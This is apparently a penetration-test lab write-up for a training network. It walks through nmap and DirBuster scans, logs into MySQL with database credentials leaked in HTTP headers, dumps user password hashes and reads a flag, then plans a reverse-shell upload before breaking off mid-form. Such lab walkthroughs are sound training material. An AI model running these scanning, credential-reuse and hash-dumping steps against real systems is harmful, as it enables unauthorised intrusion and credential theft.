Black Box Test #2
You have been engaged in a Black-box Penetration Test (172.16.64.0/24 range). Your goal is to read the flag file on each machine.
Prework
Connect to VPN
sudo openvpn black-box-penetration-test-2.ovpn
Scan network
sudo nmap -sn 172.16.64.0/24 --exclude 172.16.64.10 -oN hostAlive.nmap &&
cat hostAlive.nmap | grep for | awk {'print $5'} > ips.txt &&
sudo nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open -oX portScan.xml &&
nmap2md.sh portScan.xml | xclip
Scanner
Generated on Mon Jul 12 18:49:14 2021 with
nmap 7.91
.
nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open -oX portScan.xml
Hosts Alive (4)
172.16.64.81
Linux 3.16
95%
172.16.64.91
Linux 3.13
95%
172.16.64.92
Linux 3.12
95%
172.16.64.166
Linux 3.12
95%
Open Ports and Running Services
✔️172.16.64.81 (Linux 3.16 - 95%)
22/tcp
open
ssh
OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
80/tcp
open
http
Apache httpd 2.4.18
13306/tcp
open
mysql
MySQL 5.7.25-0ubuntu0.16.04.2
We found the following hosts in a host.bak file!
While inspecting sabrina's ssh account on ssh://sabrina:CHANGEME@172.16.64.166:222
172.16.64.81 cms.foocorp.io
172.16.64.81 static.foocorp.io
Target URL: http://172.16.64.81
File Extension: *
File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Mon Jul 12 19:22:08 EDT 2021
--------------------------------
http://172.16.64.81:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/webapp/
/default/
/webapp/img/
/webapp/templates/
/webapp/img/custom/
/webapp/img/favicon/
/webapp/templates/default/
/webapp/img/google/
/webapp/img/log_icons/
/webapp/templates/gallery/
/webapp/templates/pinboxes/
/webapp/img/custom/logo/
/webapp/assets/
/webapp/img/custom/thumbs/
/webapp/templates/gallery/font-awesome-4.6.3/
/webapp/templates/default/lang/
/webapp/templates/pinboxes/font-awesome-4.6.3/
/webapp/templates/gallery/img/
/webapp/templates/gallery/lang/
/webapp/templates/pinboxes/img/
/webapp/templates/pinboxes/js/
/webapp/templates/pinboxes/lang/
/webapp/assets/bootstrap/
/webapp/upload/
/webapp/assets/font-awesome/
/webapp/templates/pinboxes/font-awesome-4.6.3/css/
/webapp/upload/files/
/webapp/assets/bootstrap/css/
/webapp/templates/pinboxes/font-awesome-4.6.3/fonts/
/webapp/templates/gallery/font-awesome-4.6.3/css/
/webapp/assets/bootstrap/fonts/
/webapp/assets/font-awesome/css/
/webapp/templates/gallery/font-awesome-4.6.3/fonts/
/webapp/templates/pinboxes/font-awesome-4.6.3/less/
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/
/webapp/templates/gallery/font-awesome-4.6.3/less/
/webapp/assets/font-awesome/fonts/
/webapp/assets/bootstrap/js/
/webapp/templates/gallery/font-awesome-4.6.3/scss/
/webapp/assets/font-awesome/less/
/webapp/assets/font-awesome/scss/
/webapp/css/
/webapp/includes/
/webapp/includes/Google/
/webapp/includes/classes/
/webapp/includes/Google/Oauth2/
/webapp/includes/Google/Oauth2/auth/
/webapp/includes/Google/Oauth2/cache/
/webapp/includes/Google/Oauth2/contrib/
/webapp/includes/Google/Oauth2/external/
/webapp/includes/Google/Oauth2/io/
/webapp/includes/js/
/webapp/includes/Google/Oauth2/service/
/webapp/install/
/webapp/includes/phpass/
/webapp/includes/js/bootstrap-datepicker/
/webapp/includes/js/bootstrap-spinedit/
/webapp/includes/phpmailer/
/webapp/includes/plupload/
/webapp/includes/js/bootstrap-toggle/
/webapp/includes/random_compat/
/webapp/includes/js/chosen/
/webapp/includes/phpass/c/
/webapp/includes/js/ckeditor/
/webapp/includes/plupload/js/
/webapp/includes/js/bootstrap-toggle/doc/
/webapp/includes/js/flot/
/webapp/includes/js/bootstrap-spinedit/css/
/webapp/includes/js/footable/
/webapp/includes/js/bootstrap-spinedit/js/
/webapp/includes/js/chosen/docsupport/
/webapp/includes/js/bootstrap-datepicker/css/
/webapp/includes/js/bootstrap-toggle/js/
/webapp/includes/js/footable/css/
/webapp/includes/plupload/js/i18n/
/webapp/includes/js/jen/
/webapp/includes/js/bootstrap-datepicker/js/
/webapp/includes/js/footable/css/fonts/
/webapp/includes/js/ckeditor/adapters/
/webapp/includes/js/jquery-tags-input/
/webapp/includes/plupload/js/jquery.plupload.queue/
/webapp/includes/plupload/js/jquery.plupload.queue/css/
/webapp/includes/plupload/js/jquery.plupload.queue/img/
/webapp/includes/js/bootstrap-datepicker/js/locales/
/webapp/includes/js/ckeditor/lang/
/webapp/includes/js/ckeditor/plugins/
/webapp/includes/timthumb/
/webapp/includes/js/jen/bin/
/webapp/includes/js/ckeditor/skins/
/webapp/includes/timthumb/cache/
/webapp/includes/js/ckeditor/plugins/about/
/webapp/includes/js/ckeditor/plugins/clipboard/
/webapp/includes/js/ckeditor/skins/moono-lisa/
/webapp/includes/js/ckeditor/plugins/dialog/
/webapp/includes/phpmailer/extras/
/webapp/includes/js/ckeditor/plugins/about/dialogs/
/webapp/includes/widgets/
/webapp/includes/js/ckeditor/plugins/link/
/webapp/includes/js/ckeditor/plugins/clipboard/dialogs/
/webapp/includes/phpmailer/language/
/webapp/includes/js/ckeditor/plugins/link/images/
/webapp/includes/js/ckeditor/skins/moono-lisa/images/
/webapp/includes/js/ckeditor/plugins/link/dialogs/
/webapp/includes/js/ckeditor/plugins/link/images/hidpi/
/webapp/includes/js/ckeditor/plugins/about/dialogs/hidpi/
/webapp/includes/js/ckeditor/skins/moono-lisa/images/hidpi/
/webapp/lang/
/webapp/includes/js/bootstrap-toggle/css/
Dirs found with a 403 response:
/icons/
/icons/small/
--------------------------------
Files found during testing:
Files found with a 302 responce:
/webapp/process.php
/webapp/templates/session_check.php
/webapp/includes/actions.log.export.php
Files found with a 200 responce:
/webapp/img/ps-icon.svg
/webapp/templates/default/main.css
/webapp/templates/gallery/main.css
/webapp/templates/pinboxes/lang/en.mo
/webapp/templates/pinboxes/js/imagesloaded.pkgd.min.js
/webapp/templates/gallery/lang/en.mo
/webapp/templates/pinboxes/font-awesome-4.6.3/HELP-US-OUT.txt
/webapp/templates/default/lang/default.pot
/webapp/templates/pinboxes/main.css
/webapp/templates/gallery/font-awesome-4.6.3/HELP-US-OUT.txt
/webapp/img/custom/thumbs/users.bak
/webapp/templates/gallery/lang/en.po
/webapp/templates/pinboxes/main.css.map
/webapp/templates/default/lang/en.mo
/webapp/templates/pinboxes/js/jquery.masonry.min.js
/webapp/assets/bootstrap/config.json
/webapp/templates/default/lang/en.po
/webapp/templates/pinboxes/lang/en.po
/webapp/templates/pinboxes/main.scss
/webapp/templates/gallery/lang/gallery.pot
/webapp/assets/font-awesome/HELP-US-OUT.txt
/webapp/templates/pinboxes/lang/pinboxes.pot
/webapp/templates/pinboxes/font-awesome-4.6.3/css/font-awesome.css
/webapp/templates/pinboxes/font-awesome-4.6.3/css/font-awesome.min.css
/webapp/templates/gallery/font-awesome-4.6.3/css/font-awesome.css
/webapp/templates/pinboxes/font-awesome-4.6.3/fonts/FontAwesome.otf
/webapp/assets/bootstrap/css/bootstrap-theme.css
/webapp/templates/gallery/font-awesome-4.6.3/fonts/FontAwesome.otf
/webapp/assets/font-awesome/css/font-awesome.css
/webapp/templates/pinboxes/font-awesome-4.6.3/fonts/fontawesome-webfont.eot
/webapp/templates/gallery/font-awesome-4.6.3/css/font-awesome.min.css
/webapp/assets/bootstrap/fonts/glyphicons-halflings-regular.eot
/webapp/templates/gallery/font-awesome-4.6.3/scss/_animated.scss
/webapp/assets/font-awesome/less/animated.less
/webapp/assets/bootstrap/js/bootstrap.js
/webapp/assets/bootstrap/fonts/glyphicons-halflings-regular.svg
/webapp/assets/font-awesome/css/font-awesome.min.css
/webapp/templates/pinboxes/font-awesome-4.6.3/fonts/fontawesome-webfont.svg
/webapp/templates/gallery/font-awesome-4.6.3/less/animated.less
/webapp/assets/font-awesome/fonts/FontAwesome.otf
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_animated.scss
/webapp/templates/gallery/font-awesome-4.6.3/fonts/fontawesome-webfont.eot
/webapp/assets/bootstrap/css/bootstrap-theme.css.map
/webapp/templates/pinboxes/font-awesome-4.6.3/less/animated.less
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_bordered-pulled.scss
/webapp/templates/gallery/font-awesome-4.6.3/less/bordered-pulled.less
/webapp/assets/bootstrap/css/bootstrap-theme.min.css
/webapp/assets/font-awesome/fonts/fontawesome-webfont.eot
/webapp/templates/gallery/font-awesome-4.6.3/scss/_bordered-pulled.scss
/webapp/assets/bootstrap/js/bootstrap.min.js
/webapp/assets/font-awesome/less/bordered-pulled.less
/webapp/templates/gallery/font-awesome-4.6.3/fonts/fontawesome-webfont.svg
/webapp/templates/pinboxes/font-awesome-4.6.3/fonts/fontawesome-webfont.ttf
/webapp/assets/font-awesome/scss/_animated.scss
/webapp/assets/bootstrap/js/npm.js
/webapp/assets/bootstrap/fonts/glyphicons-halflings-regular.ttf
/webapp/templates/gallery/font-awesome-4.6.3/less/core.less
/webapp/templates/pinboxes/font-awesome-4.6.3/fonts/fontawesome-webfont.woff
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_core.scss
/webapp/assets/font-awesome/less/core.less
/webapp/templates/pinboxes/font-awesome-4.6.3/less/bordered-pulled.less
/webapp/assets/bootstrap/css/bootstrap-theme.min.css.map
/webapp/assets/font-awesome/scss/_bordered-pulled.scss
/webapp/templates/gallery/font-awesome-4.6.3/fonts/fontawesome-webfont.ttf
/webapp/templates/gallery/font-awesome-4.6.3/scss/_core.scss
/webapp/templates/pinboxes/font-awesome-4.6.3/less/core.less
/webapp/assets/font-awesome/less/fixed-width.less
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_fixed-width.scss
/webapp/assets/bootstrap/fonts/glyphicons-halflings-regular.woff
/webapp/templates/pinboxes/font-awesome-4.6.3/fonts/fontawesome-webfont.woff2
/webapp/assets/font-awesome/scss/_core.scss
/webapp/templates/gallery/font-awesome-4.6.3/less/fixed-width.less
/webapp/templates/gallery/font-awesome-4.6.3/scss/_fixed-width.scss
/webapp/templates/pinboxes/font-awesome-4.6.3/less/fixed-width.less
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_icons.scss
/webapp/assets/font-awesome/less/font-awesome.less
/webapp/assets/bootstrap/css/bootstrap.css
/webapp/assets/font-awesome/scss/_fixed-width.scss
/webapp/templates/gallery/font-awesome-4.6.3/fonts/fontawesome-webfont.woff
/webapp/templates/pinboxes/font-awesome-4.6.3/less/font-awesome.less
/webapp/assets/font-awesome/fonts/fontawesome-webfont.svg
/webapp/templates/gallery/font-awesome-4.6.3/less/font-awesome.less
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_larger.scss
/webapp/assets/bootstrap/fonts/glyphicons-halflings-regular.woff2
/webapp/templates/gallery/font-awesome-4.6.3/fonts/fontawesome-webfont.woff2
/webapp/assets/font-awesome/less/larger.less
/webapp/templates/gallery/font-awesome-4.6.3/scss/_larger.scss
/webapp/assets/font-awesome/fonts/fontawesome-webfont.ttf
/webapp/assets/font-awesome/fonts/fontawesome-webfont.woff
/webapp/assets/font-awesome/less/icons.less
/webapp/templates/gallery/font-awesome-4.6.3/scss/_icons.scss
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_list.scss
/webapp/templates/gallery/font-awesome-4.6.3/less/icons.less
/webapp/assets/font-awesome/scss/_icons.scss
/webapp/templates/gallery/font-awesome-4.6.3/scss/_list.scss
/webapp/templates/gallery/font-awesome-4.6.3/less/larger.less
/webapp/assets/font-awesome/scss/_larger.scss
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_mixins.scss
/webapp/assets/font-awesome/less/list.less
/webapp/assets/bootstrap/css/bootstrap.min.css
/webapp/assets/bootstrap/css/bootstrap.css.map
/webapp/templates/gallery/font-awesome-4.6.3/scss/_mixins.scss
/webapp/assets/font-awesome/less/mixins.less
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_path.scss
/webapp/assets/bootstrap/css/bootstrap.min.css.map
/webapp/templates/gallery/font-awesome-4.6.3/scss/_path.scss
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_rotated-flipped.scss
/webapp/assets/font-awesome/less/path.less
/webapp/templates/gallery/font-awesome-4.6.3/less/list.less
/webapp/templates/pinboxes/font-awesome-4.6.3/less/larger.less
/webapp/assets/font-awesome/scss/_list.scss
/webapp/templates/pinboxes/font-awesome-4.6.3/less/icons.less
/webapp/templates/gallery/font-awesome-4.6.3/scss/_rotated-flipped.scss
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_screen-reader.scss
/webapp/assets/font-awesome/less/rotated-flipped.less
/webapp/assets/font-awesome/scss/_mixins.scss
/webapp/templates/gallery/font-awesome-4.6.3/scss/_screen-reader.scss
/webapp/templates/pinboxes/font-awesome-4.6.3/less/list.less
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_stacked.scss
/webapp/assets/font-awesome/less/screen-reader.less
/webapp/assets/font-awesome/scss/_path.scss
/webapp/assets/font-awesome/scss/_rotated-flipped.scss
/webapp/assets/font-awesome/less/stacked.less
/webapp/assets/font-awesome/fonts/fontawesome-webfont.woff2
/webapp/templates/pinboxes/font-awesome-4.6.3/less/mixins.less
/webapp/templates/gallery/font-awesome-4.6.3/scss/_stacked.scss
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/_variables.scss
/webapp/assets/font-awesome/scss/_screen-reader.scss
/webapp/templates/pinboxes/font-awesome-4.6.3/less/path.less
/webapp/templates/gallery/font-awesome-4.6.3/less/mixins.less
/webapp/templates/pinboxes/font-awesome-4.6.3/scss/font-awesome.scss
/webapp/assets/font-awesome/less/variables.less
/webapp/templates/gallery/font-awesome-4.6.3/scss/_variables.scss
/webapp/assets/font-awesome/scss/_stacked.scss
/webapp/templates/gallery/font-awesome-4.6.3/scss/font-awesome.scss
/webapp/templates/pinboxes/font-awesome-4.6.3/less/rotated-flipped.less
/webapp/templates/gallery/font-awesome-4.6.3/less/path.less
/webapp/templates/pinboxes/font-awesome-4.6.3/less/screen-reader.less
/webapp/assets/font-awesome/scss/_variables.scss
/webapp/templates/gallery/font-awesome-4.6.3/less/rotated-flipped.less
/webapp/templates/pinboxes/font-awesome-4.6.3/less/stacked.less
/webapp/templates/gallery/font-awesome-4.6.3/less/screen-reader.less
/webapp/templates/pinboxes/font-awesome-4.6.3/less/variables.less
/webapp/assets/font-awesome/scss/font-awesome.scss
/webapp/templates/gallery/font-awesome-4.6.3/less/stacked.less
/webapp/templates/gallery/font-awesome-4.6.3/less/variables.less
/webapp/css/footable.css
/webapp/css/main.css.map
/webapp/css/main.min.css
/webapp/css/mobile.css.map
/webapp/css/main.scss
/webapp/css/mobile.min.css
/webapp/css/mobile.scss
/webapp/css/social-login.css
/webapp/includes/ajax-keep-alive.php
/webapp/includes/email-template.php
/webapp/includes/classes/actions-categories.php
/webapp/includes/functions.categories.php
/webapp/includes/classes/actions-clients.php
/webapp/includes/Google/Oauth2/Google_Client.php
/webapp/includes/classes/actions-files.php
/webapp/includes/functions.forms.php
/webapp/includes/functions.php
/webapp/includes/classes/actions-groups.php
/webapp/includes/Google/Oauth2/config.php
/webapp/includes/functions.templates.php
/webapp/includes/classes/actions-members.php
/webapp/includes/classes/actions-users.php
/webapp/includes/Google/Oauth2/auth/Google_AssertionCredentials.php
/webapp/includes/classes/database.php
/webapp/includes/language-locales-names.php
/webapp/includes/classes/file-upload.php
/webapp/includes/Google/Oauth2/cache/Google_Cache.php
/webapp/includes/Google/Oauth2/io/Google_CacheParser.php
/webapp/includes/Google/Oauth2/service/Google_BatchRequest.php
/webapp/includes/Google/Oauth2/auth/Google_LoginTicket.php
/webapp/includes/Google/Oauth2/external/URITemplateParser.php
/webapp/includes/classes/generate-form.php
/webapp/includes/classes/generate-table.php
/webapp/includes/Google/Oauth2/io/Google_HttpRequest.php
/webapp/includes/Google/Oauth2/service/Google_MediaFileUpload.php
/webapp/includes/classes/i18n.php
/webapp/includes/Google/Oauth2/service/Google_Model.php
/webapp/includes/Google/Oauth2/service/Google_Service.php
/webapp/includes/js/browserplus-min.js
/webapp/includes/Google/Oauth2/service/Google_ServiceResource.php
/webapp/includes/Google/Oauth2/auth/Google_Signer.php
/webapp/includes/js/bootstrap-spinedit/LICENSE.txt
/webapp/includes/phpass/PasswordHash.php
/webapp/includes/Google/Oauth2/io/Google_REST.php
/webapp/includes/js/bootstrap-datepicker/CHANGELOG.md
/webapp/includes/sys.config.php
/webapp/includes/phpmailer/LICENSE
/webapp/includes/Google/Oauth2/service/Google_Utils.php
/webapp/includes/plupload/changelog.txt
/webapp/includes/js/bootstrap-spinedit/README.md
/webapp/includes/js/chosen/options.html
/webapp/includes/js/bootstrap-datepicker/CONTRIBUTING.md
/webapp/includes/Google/Oauth2/auth/Google_Verifier.php
/webapp/includes/phpmailer/PHPMailerAutoload.php
/webapp/includes/random_compat/random_compat.phar
/webapp/includes/Google/Oauth2/io/cacerts.pem
/webapp/includes/js/bootstrap-datepicker/LICENSE
/webapp/includes/plupload/license.txt
/webapp/includes/phpmailer/VERSION
/webapp/includes/js/chosen/index.proto.html
/webapp/includes/js/bootstrap-toggle/doc/nytdev.svg
/webapp/includes/sys.config.sample.php
/webapp/includes/random_compat/random_compat.phar.pubkey
/webapp/includes/js/bootstrap-toggle/doc/script.js
/webapp/includes/js/ckeditor/CHANGES.md
/webapp/includes/js/bootstrap-datepicker/README.md
/webapp/includes/js/chosen/chosen.jquery.js
/webapp/includes/phpass/c/Makefile
/webapp/includes/js/chosen/docsupport/prism.js
/webapp/includes/plupload/readme.md
/webapp/includes/phpmailer/class.phpmailer.php
/webapp/includes/random_compat/random_compat.phar.pubkey.asc
/webapp/includes/js/ckeditor/LICENSE.md
/webapp/includes/js/bootstrap-spinedit/css/bootstrap-spinedit.css
/webapp/includes/js/bootstrap-spinedit/js/bootstrap-spinedit.js
/webapp/includes/js/html5shiv.min.js
/webapp/includes/js/footable/footable.all.min.js
/webapp/includes/js/bootstrap-toggle/doc/stylesheet.css
/webapp/includes/js/ckeditor/README.md
/webapp/includes/phpass/c/crypt_private.c
/webapp/includes/js/bootstrap-toggle/js/bootstrap-toggle.js
/webapp/includes/js/chosen/index.html
/webapp/includes/js/chosen/docsupport/prism.css
/webapp/includes/phpmailer/class.phpmaileroauthgoogle.php
/webapp/includes/js/bootstrap-toggle/js/bootstrap-toggle.min.js
/webapp/includes/js/bootstrap-datepicker/css/datepicker.css
/webapp/includes/js/ckeditor/build-config.js
/webapp/includes/js/footable/footable.filter.min.js
/webapp/includes/plupload/js/i18n/cs.js
/webapp/includes/js/footable/css/footable.core.css
/webapp/includes/js/chosen/docsupport/style.css
/webapp/includes/js/chosen/chosen.proto.js
/webapp/includes/js/bootstrap-toggle/js/bootstrap-toggle.min.js.map
/webapp/includes/plupload/js/plupload.browserplus.js
/webapp/includes/js/jen/LICENSE
/webapp/includes/js/bootstrap-toggle/js/bootstrap2-toggle.js
/webapp/includes/timezone_identifiers_list.php
/webapp/includes/js/ckeditor/config.js
/webapp/includes/js/ckeditor/ckeditor.js
/webapp/includes/js/bootstrap-datepicker/js/bootstrap-datepicker.js
/webapp/includes/js/jquery.1.12.4.min.js
/webapp/includes/phpmailer/class.pop3.php
/webapp/includes/js/footable/css/footable.core.min.css
/webapp/includes/js/jquery-tags-input/jquery.tagsinput.css
/webapp/includes/js/footable/css/fonts/footable.eot
/webapp/includes/plupload/js/i18n/da.js
/webapp/includes/js/ckeditor/adapters/jquery.js
/webapp/includes/js/jquery-tags-input/jquery.tagsinput.min.js
/webapp/includes/js/ckeditor/contents.css
/webapp/includes/js/bootstrap-toggle/js/bootstrap2-toggle.min.js
/webapp/includes/js/jen/README.md
/webapp/includes/js/footable/css/footable.metro.css
/webapp/includes/js/footable/footable.min.js
/webapp/includes/phpmailer/class.smtp.php
/webapp/includes/plupload/js/jquery.plupload.queue/jquery.plupload.queue.js
/webapp/includes/timezones.php
/webapp/includes/js/bootstrap-toggle/js/bootstrap2-toggle.min.js.map
/webapp/includes/plupload/js/i18n/de.js
/webapp/includes/plupload/js/plupload.flash.js
/webapp/includes/plupload/js/jquery.plupload.queue/css/jquery.plupload.queue.css
/webapp/includes/plupload/js/i18n/el.js
/webapp/includes/plupload/js/plupload.flash.swf
/webapp/includes/phpmailer/composer.json
/webapp/includes/js/jquery.psendmodal.js
/webapp/includes/js/footable/css/fonts/footable.svg
/webapp/includes/js/footable/footable.paginate.min.js
/webapp/includes/plupload/js/i18n/es.js
/webapp/includes/js/footable/css/footable.metro.min.css
/webapp/includes/plupload/js/plupload.full.js
/webapp/includes/js/ckeditor/styles.js
/webapp/includes/js/jen/jen.js
/webapp/includes/plupload/js/i18n/et.js
/webapp/includes/plupload/js/plupload.gears.js
/webapp/includes/js/footable/footable.sort.min.js
/webapp/includes/js/jquery.validations.js
/webapp/includes/updates.functions.php
/webapp/includes/js/footable/css/fonts/footable.ttf
/webapp/includes/js/jen/bin/jen
/webapp/includes/plupload/js/plupload.html4.js
/webapp/includes/phpmailer/composer.lock
/webapp/includes/plupload/js/i18n/fa.js
/webapp/includes/js/jen/package.json
/webapp/includes/js/footable/css/footable.standalone.css
/webapp/includes/plupload/js/plupload.html5.js
/webapp/includes/updates.messages.php
/webapp/includes/plupload/js/plupload.js
/webapp/includes/js/js.cookie.js
/webapp/includes/plupload/js/i18n/fi.js
/webapp/includes/js/footable/css/footable.standalone.min.css
/webapp/includes/plupload/js/plupload.silverlight.js
/webapp/includes/js/footable/css/fonts/footable.woff
/webapp/includes/plupload/js/i18n/fr-ca.js
/webapp/includes/js/js.functions.php
/webapp/includes/plupload/js/plupload.silverlight.xap
/webapp/includes/js/main.js
/webapp/includes/phpmailer/extras/EasyPeasyICS.php
/webapp/includes/js/ckeditor/plugins/dialog/dialogDefinition.js
/webapp/includes/plupload/js/i18n/fr.js
/webapp/includes/phpmailer/extras/README.md
/webapp/includes/js/ckeditor/skins/moono-lisa/dialog.css
/webapp/includes/js/ckeditor/skins/moono-lisa/dialog_ie.css
/webapp/includes/plupload/js/i18n/hr.js
/webapp/includes/js/respond.min.js
/webapp/includes/phpmailer/extras/htmlfilter.php
/webapp/includes/plupload/js/i18n/hu.js
/webapp/includes/js/ckeditor/plugins/about/dialogs/about.js
/webapp/includes/js/ckeditor/skins/moono-lisa/dialog_ie8.css
/webapp/includes/widgets/news.php
/webapp/includes/plupload/js/i18n/it.js
/webapp/includes/phpmailer/extras/ntlm_sasl_client.php
/webapp/includes/js/ckeditor/plugins/clipboard/dialogs/paste.js
/webapp/includes/js/ckeditor/skins/moono-lisa/dialog_iequirks.css
/webapp/includes/js/ckeditor/plugins/link/dialogs/anchor.js
/webapp/includes/js/ckeditor/plugins/link/dialogs/link.js
/webapp/includes/plupload/js/i18n/ja.js
/webapp/includes/js/ckeditor/skins/moono-lisa/editor.css
/webapp/includes/plupload/js/i18n/ko.js
/webapp/includes/js/ckeditor/skins/moono-lisa/editor_gecko.css
/webapp/includes/plupload/js/i18n/lv.js
/webapp/includes/js/ckeditor/skins/moono-lisa/editor_ie.css
/webapp/includes/plupload/js/i18n/nl.js
/webapp/includes/js/ckeditor/skins/moono-lisa/editor_ie8.css
/webapp/includes/plupload/js/i18n/pl.js
/webapp/includes/js/ckeditor/skins/moono-lisa/editor_iequirks.css
/webapp/includes/js/ckeditor/skins/moono-lisa/readme.md
/webapp/includes/plupload/js/i18n/pt-br.js
/webapp/includes/plupload/js/i18n/ro.js
/webapp/includes/plupload/js/i18n/ru.js
/webapp/includes/plupload/js/i18n/sk.js
/webapp/includes/plupload/js/i18n/sr.js
/webapp/includes/plupload/js/i18n/sv.js
/webapp/lang/cftp_admin.pot
/webapp/lang/en.mo
/webapp/lang/en.po
/webapp/includes/js/bootstrap-toggle/css/bootstrap-toggle.css
/webapp/includes/js/bootstrap-toggle/css/bootstrap-toggle.min.css
/webapp/includes/js/bootstrap-toggle/css/bootstrap2-toggle.css
/webapp/includes/js/bootstrap-toggle/css/bootstrap2-toggle.min.css
Files found with a 500 responce:
/webapp/templates/common.php
/webapp/templates/default/template.php
/webapp/templates/gallery/template.php
/webapp/templates/pinboxes/template.php
/webapp/includes/active.session.php
/webapp/includes/core.update.php
/webapp/includes/core.update.silent.php
/webapp/includes/classes/actions-log.php
/webapp/includes/includes.php
/webapp/includes/Google/Oauth2/cache/Google_ApcCache.php
/webapp/includes/Google/Oauth2/auth/Google_Auth.php
/webapp/includes/language.php
/webapp/includes/classes/form-validation.php
/webapp/includes/Google/Oauth2/auth/Google_AuthNone.php
/webapp/includes/Google/Oauth2/cache/Google_FileCache.php
/webapp/includes/Google/Oauth2/io/Google_CurlIO.php
/webapp/includes/Google/Oauth2/cache/Google_MemcacheCache.php
/webapp/includes/Google/Oauth2/auth/Google_OAuth2.php
/webapp/includes/Google/Oauth2/auth/Google_P12Signer.php
/webapp/includes/Google/Oauth2/io/Google_HttpStreamIO.php
/webapp/includes/Google/Oauth2/io/Google_IO.php
/webapp/includes/classes/send-email.php
/webapp/includes/site.options.php
/webapp/includes/Google/Oauth2/auth/Google_PemVerifier.php
/webapp/includes/sys.vars.php
/webapp/includes/phpmailer/class.phpmaileroauth.php
/webapp/includes/thumb.php
/webapp/includes/userlevel_check.php
/webapp/includes/vars.php
/webapp/includes/phpmailer/get_oauth_token.php
/webapp/includes/widgets/actions-log.php
/webapp/includes/widgets/statistics.php
/webapp/includes/widgets/system-information.php
--------------------------------
Dirbuster found the following route with potential credentials!
john1:password123
peter:youdonotguessthatone5
[Web] We get redirected trying to login with john1:password123
and we find the application leaks database credentials in its headers!
HTTP/1.1 302 Found
Date: Thu, 22 Jul 2021 23:05:39 GMT
Server: Apache/2.4.18 (Ubuntu)
X-DB-Key: x41x41x412019!
X-DB-User: root
X-DB-name: mysql
Location: 500.php
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
mysql --host=172.16.64.81 \
--user=root \
--password=x41x41x412019! \
--port 13306 mysql
> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| cmsbase |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.143 sec)
> use cmsbase;
> show tables;
+----------------------------+
| Tables_in_cmsbase |
+----------------------------+
| flag |
| sqlmapfile |
| tbl_1_actions_log |
| tbl_1_categories |
| tbl_1_categories_relations |
| tbl_1_downloads |
| tbl_1_files |
| tbl_1_files_relations |
| tbl_1_folders |
| tbl_1_groups |
| tbl_1_members |
| tbl_1_members_requests |
| tbl_1_notifications |
| tbl_1_options |
| tbl_1_password_reset |
| tbl_1_users |
| tbl_actions_log |
| tbl_categories |
| tbl_categories_relations |
| tbl_downloads |
| tbl_files |
| tbl_files_relations |
| tbl_folders |
| tbl_groups |
| tbl_members |
| tbl_members_requests |
| tbl_notifications |
| tbl_options |
| tbl_password_reset |
| tbl_users |
+----------------------------+
30 rows in set (0.142 sec)
We find user credentials on the cmsbase.tbl_users
table:
MySQL [cmsbase]> select user,password,name,email from tbl_users;
+---------+--------------------------------------------------------------+---------+-------------------+
| user | password | name | email |
+---------+--------------------------------------------------------------+---------+-------------------+
| foocorp | $2a$08$f2fG8Ncpmj815xQ9U3Ylh.uD0VW/X6kOgjPIEHKP547jspS0FlHF6 | foocorp | admin@foocorp.io |
| mickey | $2a$08$w/oljwDbODAThUR4HTVO8eUjTabE80sH0i6xnOR97ZXfsGGmxohAW | mickey | mickey@foocorp.io |
| donald | $2a$08$dK04y0KEURxDv02vYRab1OMYMSWbW/bpGF.eAWrWv9JAGaa4yTxlq | donald | donald@foocorp.io |
+---------+--------------------------------------------------------------+---------+-------------------+
Flag encountered! 😁
While inspecting database tables, we find our flag in the cmsbase.flag
table.
select * from flag;
+----+------------------------------+
| id | content |
+----+------------------------------+
| 1 | Congratulations, you got it! |
+----+------------------------------+
1 row in set (0.141 sec)
✔️172.16.64.91 (Linux 3.13 - 95%)
80/tcp
open
http
Apache httpd 2.4.18
6379/tcp
open
redis
Redis key-value store
This machine's domain name is http://75ajvxi36vchsv584es1.foocorp.io/ ****
This route should be added in the local /etc/host
.
Target URL: http://172.16.64.91
File Extension: *
File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Jul 22 17:24:30 EDT 2021
--------------------------------
http://172.16.64.91:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
Dirs found with a 403 response:
/icons/
/icons/small/
/server-status/
--------------------------------
--------------------------------
dirb http://75ajvxi36vchsv584es1.foocorp.io/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Aug 2 09:46:23 2021
URL_BASE: http://75ajvxi36vchsv584es1.foocorp.io/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://75ajvxi36vchsv584es1.foocorp.io/ ----
==> DIRECTORY: http://75ajvxi36vchsv584es1.foocorp.io/app/
A route to an app was discovered
A file can be uploaded although form is broken
Actions:
Fix upload form
Upload reverse shell
# Save a local file with this updated code for the form
# Notice the form action argument
<html><body style="background: black; color: white;">
<script src="http://75ajvxi36vchsv584es1.foocorp.io/app/js/auth.js"></script>
<center><div style="border: 1px yellow double">
<br /><br />
<form action="http://75ajvxi36vchsv584es1.foocorp.io/app/upload.php" method="post" enctype="multipart/form-data">
<br />Select file to upload:
